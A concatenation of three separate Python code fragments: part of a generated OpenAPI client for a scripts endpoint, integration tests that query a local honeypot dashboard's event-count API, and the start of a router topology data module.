returns the request thread.
:rtype: ScriptsSearchResults
"""
kwargs['_return_http_data_only'] = True
return self.v1_scripts_get_with_http_info(**kwargs) # noqa: E501
def v1_scripts_get_with_http_info(self, **kwargs): # noqa: E501
"""Search for sorted and paged Scripts # noqa: E501
Search for sorted and paged scripts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_scripts_get_with_http_info(async_req=True)
>>> result = thread.get()
:param page:
:type page: int
:param page_size:
:type page_size: int
:param sort: Sorting criteria in the format: property:asc/desc. Default sort is name:asc. Multiple sort criteria are supported and must be separated with a comma. Fields allowed in the query: `id`, `name`, `info`, `notes`, `priority`, `categoryId`, `categoryName`, `parameter4` up to `parameter11`, `osRequirements`, `scriptContents`. Example: sort=date:desc,name:asc
:type sort: list[str]
:param filter: Query in the RSQL format, allowing to filter scripts collection. Default search is empty query - returning all results for the requested page. Fields allowed in the query: `id`, `name`, `info`, `notes`, `priority`, `categoryId`, `categoryName`, `parameter4` up to `parameter11`, `osRequirements`, `scriptContents`. This param can be combined with paging and sorting. Example: filter=categoryName==\"Category\" and name==\"*script name*\"
:type filter: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(ScriptsSearchResults, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'page',
'page_size',
'sort',
'filter'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_scripts_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] is not None: # noqa: E501
query_params.append(('page-size', local_var_params['page_size'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
if 'filter' in local_var_params and local_var_params['filter'] is not None: # noqa: E501
query_params.append(('filter', local_var_params['filter'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "ScriptsSearchResults",
}
return self.api_client.call_api(
'/v1/scripts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_scripts_id_delete(self, id, **kwargs): # noqa: E501
"""Delete a Script at the specified id # noqa: E501
Deletes a script at the specified id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_scripts_id_delete(id, async_req=True)
>>> result = thread.get()
:param id: Script object identifier (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.v1_scripts_id_delete_with_http_info(id, **kwargs) # noqa: E501
def v1_scripts_id_delete_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a Script at the specified id # noqa: E501
Deletes a script at the specified id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_scripts_id_delete_with_http_info(id, async_req=True)
>>> result = thread.get()
:param id: Script object identifier (required)
:type id: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_scripts_id_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise | |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import requests
from core.get_modules import load_all_modules
# Base URL of the locally running API server these integration tests hit.
API_URL = 'http://127.0.0.1:5000'
class TestApi(unittest.TestCase):
def test_index(self):
"""
Test if the API is running
"""
response = requests.get(API_URL)
self.assertEqual(response.status_code, 200)
def test_count_all_events(self):
response = requests.get(API_URL + "/api/events/count/all")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_count_honeypot_events(self):
response = requests.get(API_URL + "/api/events/count/honeypot")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_count_network_events(self):
response = requests.get(API_URL + "/api/events/count/network")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_count_credential_events(self):
response = requests.get(API_URL + "/api/events/count/credential")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_count_file_events(self):
response = requests.get(API_URL + "/api/events/count/file")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_count_data_events(self):
response = requests.get(API_URL + "/api/events/count/data")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
response = requests.get(API_URL + "/api/events/count/data?date=2020-08-14")
self.assertGreaterEqual(response.json()["count"], 0)
self.assertEqual(response.status_code, 200)
def test_top_ten_honeypot_events(self):
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/ip_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/port_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/port_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/port_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/honeypot/port_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/username")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/username?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/username?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/username?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/password")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/password?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/password?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/password?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/machine_name")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/machine_name?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/machine_name?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/honeypot/machine_name?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/country_ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/country_ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/honeypot/country_ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/honeypot/country_ip_dest?country_ip_dest=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
def test_top_ten_network_events(self):
response_port = requests.get(API_URL + "/api/events/count/groupby/network/ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/ip_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/port_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/port_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/port_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/port_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/username")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/username?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/username?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/username?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/password")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/password?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/password?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/password?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/machine_name")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/machine_name?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/machine_name?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/network/machine_name?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/country_ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/country_ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/network/country_ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/network/country_ip_dest?country_ip_dest=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
def test_top_ten_credential_events(self):
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/ip_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/port_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/port_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/port_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/port_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/username")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/username?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/username?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/username?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/password")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/password?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/password?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/password?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/machine_name")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/machine_name?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/machine_name?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/machine_name?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/country_ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/country_ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/credential/country_ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/credential/country_ip_dest?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
def test_top_ten_file_events(self):
response_port = requests.get(API_URL + "/api/events/count/groupby/file/ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/ip_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/port_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/port_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/port_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/port_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/username")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/username?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/username?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/username?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/password")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/password?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/password?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/password?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/machine_name")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/machine_name?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/machine_name?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/file/machine_name?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/country_ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/country_ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/file/country_ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/file/country_ip_dest?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
def test_top_ten_data_events(self):
response_port = requests.get(API_URL + "/api/events/count/groupby/data/ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/ip_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/port_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/port_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/port_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/port_dest?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/username")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/username?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/username?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/username?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/password")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/password?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/password?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/password?country=US&date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/machine_name")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/machine_name?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/machine_name?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/data/machine_name?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/country_ip_dest")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/country_ip_dest?country=US")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(API_URL + "/api/events/count/groupby/data/country_ip_dest?date=2020-08-14")
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
response_port = requests.get(
API_URL + "/api/events/count/groupby/data/country_ip_dest?country=US&date=2020-08-14"
)
self.assertGreaterEqual(len(response_port.json()), 0)
self.assertEqual(response_port.status_code, 200)
def test_honeypot_events_list(self):
response_honeypot = requests.get(API_URL + "/api/events/explore/honeypot")
self.assertGreaterEqual(len(response_honeypot.json()), 0)
self.assertEqual(response_honeypot.status_code, 200)
response_honeypot_countries = requests.get(
API_URL + "/api/events/explore/honeypot?module_name=ssh/strong_password"
)
self.assertGreaterEqual(len(response_honeypot_countries.json()), 0)
self.assertEqual(response_honeypot_countries.status_code, 200)
response_honeypot_countries = requests.get(
API_URL + "/api/events/explore/honeypot?date=2020-08-14"
)
self.assertGreaterEqual(len(response_honeypot_countries.json()), 0)
self.assertEqual(response_honeypot_countries.status_code, 200)
response_honeypot_machinenames = requests.get(
API_URL + "/api/events/explore/honeypot?module_name=ssh/strong_password&date=2020-08-14"
)
self.assertGreaterEqual(len(response_honeypot_machinenames.json()), 0)
self.assertEqual(response_honeypot_machinenames.status_code, 200)
def test_network_events_list(self):
response_network = requests.get(API_URL + "/api/events/explore/network")
self.assertGreaterEqual(len(response_network.json()), 0)
self.assertEqual(response_network.status_code, 200)
response_network_countries = requests.get(
API_URL + "/api/events/explore/network?module_name=ssh/strong_password"
| |
"""
topology data for routers
based on: mockTopoData.js by tylevine on 7/7/14.
Used to create API response for to UI
updated 20150312 with more nodes (50 state capitals)
"""
topologyData = {
'nodes': [{
'name': 'sfc',
'latitude': 38.4815631942872,
'ipaddress': 'fc00:db20:35b:7399::5',
'site': 'sfc',
'longitude': -122.625227367593,
'type': 'transit',
'icon': 'router',
'y': 550.31264292335,
'x': -1021.91217850693
}, {
'name': 'sea',
'latitude': 47.6062,
'ipaddress': 'fdf8:f53e:61e4::18',
'site': 'sea',
'longitude': -122.332,
'type': 'transit',
'icon': 'router',
'y': -9.8292223022888,
'x': -552.893870303646
}, {
'name': 'hst',
'latitude': 29.7633,
